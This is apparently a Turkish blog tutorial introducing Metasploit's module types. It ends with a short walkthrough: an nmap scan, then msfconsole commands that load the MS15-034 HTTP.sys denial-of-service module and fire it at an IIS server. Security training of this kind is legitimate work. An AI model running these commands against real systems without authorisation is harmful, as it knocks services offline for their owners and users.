Commonly used penetration testing framework Metasploit #1 / Yaygın kullanılan penetrasyon test framework’ü Metasploit #1

Bu makalede, Metasploit’in temel özelliklerine değinilecek ve küçük bir uygulama yapılacaktır. Anlatıma başlamadan önce “Metasploit nedir?” sorusuna cevap vermeye çalışalım.  Metasploit Framework, Ruby tabanlı bir penetrasyon test platformudur ve barındırdığı bir çok gereç ile size güvenlik açıklarını bulmanızı, saldırı tespiti yapmanızı ve saldırıdan kaçınmanızı sağlar.

Metasploit’i Kali Linux üzerinde kullanabileceğiniz gibi bir Windows işletim sisteminde, Ubuntu-Debian bir platformda ya da Mac OS X’de kullanabilirsiniz (installing-the-metasploit-framework).

Metasploit Modules

Modüller, Metasploit Framework’ün temel çekirdek bileşenleridir. Modülü, yazılımın bir parçası gibi tanımlayabiliriz ve tarama (scanning) ya da sömürü (exploit) gibi aksiyonları almak için kullanabiliriz. Metasploit Framework ile gerçekleştirebileceğiniz her görev bir modül içinde tanımlanır.

Auxiliary

İsteğe bağlı aksiyonlar için kullanılabilir. Doğrudan sömürü (exploit) ile alakalı değildir. Auxiliary module örnek olarak, scanners, fuzzers ve denial of service.

Exploit

Bir sistemde veya uygulamada bulunan belirli bir güvenlik açığını hedeflemek için bir dizi komut çalıştırır ve hedef sisteme erişim sağlamak için güvenlik açığından yararlanır. Exploit modüle örnek olarak, buffer overflow, code injection, and web application.

Post

Daha fazla bilgi toplamanızı veya exploit komutu uygulanan hedef sisteme daha fazla erişim elde etmenizi sağlar. Post-exploitation modüle örnek olarak, hash dumps, application and service enumerators.

Payload

Payload, bir sistemin tamamiyle ele geçirilmesinden sonra çalışan shell kodudur. Shell’e nasıl bağlanmak istediğinizi ve kontrolü ele aldıktan sonra hedef sisteme neler yapmak istediğinizi tanımladığınız bölümdür. Payload’da Meterpreter ya da command shell çalıştırabilirsiniz. Meterpreter oldukça gelişmiş bir payload’dur ve sizin dinamik olarak ihtiyacınıza göre DLL dosyaları yazmanıza olanak tanır.

Nop generator

Nop, rastgele byte üreterek standart IDS ve IPS NOP imzalarının bypass edilmesini sağlar.      

A small piece of Metasploit application

 Nmap ile IIS yüklü olan Windows Server 2012 R2 sunucumuzda port taraması yapıp, http 80 portu üzerinden DDOS atak gerçekleştireceğiz.

nmap -T4 -F TargetIPAddress
msfconsole

search ms15
use auxiliary/dos/http/ms15_034_ulonglongadd
show options
set rhosts TargetIPAddress

exploit

Kaynak#1

Kaynak#2